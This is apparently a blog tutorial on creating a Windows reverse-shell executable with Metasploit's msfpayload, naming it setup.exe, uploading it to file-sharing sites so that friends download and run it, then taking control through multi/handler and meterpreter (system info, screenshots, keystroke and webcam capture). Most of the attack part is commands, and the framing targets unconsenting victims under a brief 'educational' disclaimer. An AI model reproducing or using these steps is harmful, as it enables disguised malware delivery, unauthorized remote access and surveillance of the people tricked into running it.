Create your Own Payload to Hack windows Os using Metasploit.


Yesterday i posted Exploiting Windows Os using java signed applet code execution to exploiting a windows vulnerability to logging into the system with out username and password using Metasploit.

Today we going to create our own  payload in an executable binary  to hack windows os.

let’s look at how to create stand-alone Metasploit binary payloads with msfpayload. For starters, we’ll create a simple reverse shell that connects back to the attacker and spawns a command shell. We’ll use msfpayload and windows/shell_reverse_tcp. But first, let’s look at the available options for the shell_reverse_tcp payload using the O flag.

#msfpayload windows/shell_reverse_tcp  O

Screenshot from 2014-05-23 15:23:13

Now let’s run msfpayload again and provide the options needed to create this payload in the Windows Portable Executable (PE) format. To do so, we provide the X option as shown at as our output format.

#msfpayload windows/shell_reverse_tcp LHOST=   LPORT=666   X > /home/sathish/setup.exe

Screenshot from 2014-05-09 16:11:39

Check the executable file is present in the following path

#file /home/sathish/setup.exe

Screenshot from 2014-05-23 14:15:57

Now, you need to upload this file, which in this case is setup.exe, to any file uploading and sharing site such as MediaFire or 4shared and then tell this download link of your file to your friends and let them download it

Now we have a working executable, so we can start a listener with the multi/handler module in msfconsole. multi/handler allows Metasploit to listen

for reverse connections.


Screenshot from 2014-05-21 13:14:19

#msf > use exploit/multi/handler

#msf exploit(handler) > show options

#msf exploit(handler) > set PAYLOAD windows/shell_reverse_tcp

#msf exploit(handler) > set LHOST

#msf exploit(handler) > set LPORT 666

We first use the multi/handler module at and get a quick display of the options at . Then, we set our payload to be a Windows reverse shell at so

that it matches the behavior of the executable we created earlier, tell it the IP at and the port to listen on at , and we’re ready to go.

#msf exploit(handler) > exploit

Screenshot from 2014-05-09 16:52:19

Once the victim has downloaded the file and has installed the file and has run it on his computer then you will see the responses on your computer.

Then this will create a channel and  you can access the Windows and Now you will see that you access to the C drive of the victims computer, basically the drive on which the OS is installed on. So if you want then type sysinfo to get the system information about the victims computer.

#meterpreter >  sysinfo

#meterpreter > screenshot

Screenshot from 2014-05-09 16:58:44

It will the screenshot of current window desktop.There are also other meterpreter commands like  record keystrokes, capture a snapshot from a webcam, etc. To enter the command shell of the machine, type shell.

Screenshot from 2014-05-09 17:00:12

One more thing that this all thing are happen only when firewall and Antivirus  is disabled in victims computer.

This tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s

Didier Stevens

(blog \'DidierStevens)


Red Teamer and Security Addict

Digital Hacker

Digital Hacker


IT Security Research and Services


About assembler and stuff

Penetration Testing Academy

Education and Advice for Rookies

%d bloggers like this: